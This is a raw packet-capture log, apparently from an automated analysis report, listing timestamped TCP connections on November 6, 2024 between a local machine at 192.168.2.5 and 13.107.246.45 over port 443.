                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.642011881 CET4434981913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.642040014 CET4434981913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.643615961 CET4434982313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.644062996 CET49823443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.644083977 CET4434982313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.644575119 CET49823443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.644579887 CET4434982313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.645931959 CET49831443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.645965099 CET4434983113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.646131992 CET49831443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.646245003 CET49831443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.646259069 CET4434983113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.652206898 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.652602911 CET49822443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.652626038 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.653019905 CET49822443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.653024912 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.770200014 CET4434982413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.770438910 CET4434982413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.770499945 CET49824443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.778920889 CET4434982313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.779392958 CET4434982313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.779458046 CET49823443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.783142090 CET49824443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.783163071 CET4434982413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.783185959 CET49824443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.783193111 CET4434982413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.786418915 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.786427975 CET49823443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.786427975 CET49823443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.786442041 CET4434982313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.786449909 CET4434982313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.786473989 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.786533117 CET49822443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.788212061 CET49822443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.788220882 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.788258076 CET49822443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.788264036 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.792799950 CET49832443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.792824030 CET4434983213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.793015957 CET49832443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.794236898 CET49833443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.794276953 CET4434983313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.794336081 CET49833443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.795090914 CET49832443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.795103073 CET4434983213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.796216011 CET49834443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.796226025 CET4434983413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.796431065 CET49834443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.797017097 CET49833443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.797034979 CET4434983313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.797255993 CET49834443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.797270060 CET4434983413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.370892048 CET4434983113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.371932030 CET49831443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.371948957 CET4434983113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.373986959 CET49831443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.373991013 CET4434983113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.497426033 CET4434983113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.497629881 CET4434983113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.497752905 CET49831443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.499121904 CET49831443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.499138117 CET4434983113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.499444962 CET49831443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.499453068 CET4434983113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.508349895 CET49842443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.508389950 CET4434984213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.508471012 CET49842443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.508749008 CET49842443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.508760929 CET4434984213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.525415897 CET4434983413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.526402950 CET49834443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.526427031 CET4434983413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.527065992 CET4434983213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.527196884 CET49834443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.527200937 CET4434983413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.528318882 CET49832443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.528318882 CET49832443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.528331041 CET4434983213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.528337955 CET4434983213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.535375118 CET4434983313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.536164045 CET49833443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.536164045 CET49833443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.536183119 CET4434983313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.536191940 CET4434983313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.655837059 CET4434983213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.655890942 CET4434983213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.655966997 CET49832443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.656284094 CET49832443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.656284094 CET49832443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.656291962 CET4434983213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.656300068 CET4434983213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.659491062 CET49853443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.659512043 CET4434985313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.662034035 CET49853443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.662256956 CET49853443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.662269115 CET4434985313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.665985107 CET4434983313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.666033030 CET4434983313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.666101933 CET49833443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.666538000 CET49833443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.666551113 CET4434983313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.666610003 CET49833443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.666615009 CET4434983313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.669181108 CET49854443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.669204950 CET4434985413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.669292927 CET49854443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.669610023 CET49854443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.669629097 CET4434985413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.701400042 CET4434983413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.701801062 CET4434983413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.701881886 CET49834443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.701941967 CET49834443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.701941967 CET49834443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.701951027 CET4434983413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.701958895 CET4434983413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.704009056 CET49855443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.704019070 CET4434985513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.706059933 CET49855443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.706365108 CET49855443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:36.706373930 CET4434985513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.240679026 CET4434984213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.286362886 CET49842443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.313522100 CET49842443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.313535929 CET4434984213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.314137936 CET49842443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.314145088 CET4434984213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.389585972 CET4434985313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.395466089 CET49853443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.395477057 CET4434985313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.395972013 CET49853443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.395976067 CET4434985313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.403634071 CET4434985413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.404108047 CET49854443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.404125929 CET4434985413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.404616117 CET49854443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.404620886 CET4434985413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.433964968 CET4434985513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.439605951 CET4434984213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.439774036 CET4434984213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.439831018 CET49842443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.474793911 CET49855443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.474802971 CET4434985513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.475404978 CET49855443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.475409031 CET4434985513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.475656033 CET49842443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.475677013 CET4434984213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.475688934 CET49842443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.475694895 CET4434984213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.485748053 CET49856443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.485769033 CET4434985613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.485835075 CET49856443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.486645937 CET49856443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.486656904 CET4434985613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.521256924 CET4434985313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.521271944 CET4434985313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.521348953 CET49853443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.521354914 CET4434985313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.521410942 CET4434985313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.521457911 CET49853443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.525158882 CET49853443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.525167942 CET4434985313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.525176048 CET49853443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.525181055 CET4434985313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.532176018 CET4434985413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.532217026 CET4434985413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.532269001 CET49854443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.533651114 CET49854443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.533651114 CET49854443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.533668995 CET4434985413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.533679008 CET4434985413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.547579050 CET49858443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.547590971 CET4434985813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.547846079 CET49858443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.548902988 CET49859443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.548938990 CET4434985913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.549011946 CET49859443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.552592993 CET49858443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.552603960 CET4434985813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.553066015 CET49859443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.553085089 CET4434985913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.599704981 CET4434985513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.599769115 CET4434985513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.600003004 CET49855443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.600132942 CET49855443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.600141048 CET4434985513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.600152016 CET49855443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.600156069 CET4434985513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.603419065 CET49862443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.603446007 CET4434986213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.603781939 CET49862443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.603904963 CET49862443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:37.603918076 CET4434986213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.237109900 CET4434985613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.239619017 CET49856443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.239638090 CET4434985613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.240746975 CET49856443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.240751028 CET4434985613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.278243065 CET4434985913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.278645039 CET49859443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.278661013 CET4434985913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.279134035 CET49859443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.279139996 CET4434985913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.314078093 CET4434985813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.316454887 CET49858443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.316466093 CET4434985813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.317400932 CET49858443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.317404985 CET4434985813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.331300020 CET4434986213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.331824064 CET49862443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.331844091 CET4434986213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.332241058 CET49862443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.332245111 CET4434986213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.369679928 CET4434985613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.369708061 CET4434985613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.369807005 CET4434985613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.369810104 CET49856443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.369860888 CET49856443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.372734070 CET49856443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.372745991 CET4434985613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.372764111 CET49856443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.372769117 CET4434985613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.375973940 CET49873443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.375999928 CET4434987313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.376091957 CET49873443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.377439976 CET49873443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.377458096 CET4434987313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.445221901 CET4434985813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.445240974 CET4434985813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.445327044 CET49858443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.445336103 CET4434985813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.445364952 CET4434985813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.445380926 CET49858443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.445421934 CET49858443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.458122015 CET4434985913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.458148003 CET4434985913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.458221912 CET49859443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.458240986 CET4434985913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.458290100 CET4434985913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.458347082 CET49859443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.459882975 CET4434986213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.459933043 CET4434986213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.460026979 CET49862443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.461755037 CET49858443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.461761951 CET4434985813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.461827040 CET49858443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.461831093 CET4434985813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.463290930 CET49859443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.463309050 CET4434985913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.464771032 CET49862443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.464783907 CET4434986213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.464924097 CET49862443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.464929104 CET4434986213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.470843077 CET49874443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.470875025 CET4434987413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.470949888 CET49874443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.472014904 CET49875443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.472043037 CET4434987513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.472098112 CET49875443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.474968910 CET49876443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.475013018 CET4434987613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.475059986 CET49876443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.475327969 CET49874443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.475339890 CET4434987413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.475801945 CET49875443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.475821972 CET4434987513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.475902081 CET49876443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:38.475917101 CET4434987613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:39.161936045 CET4434987313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:39.167589903 CET49873443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:39.167619944 CET4434987313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:39.168374062 CET49873443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:39.168379068 CET4434987313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:39.217046022 CET4434987513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:39.225318909 CET49875443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:39.225334883 CET4434987513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:39.225963116 CET49875443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:39.225966930 CET4434987513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:39.235970974 CET4434987613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:39.236352921 CET49876443192.168.2.513.107.246.45
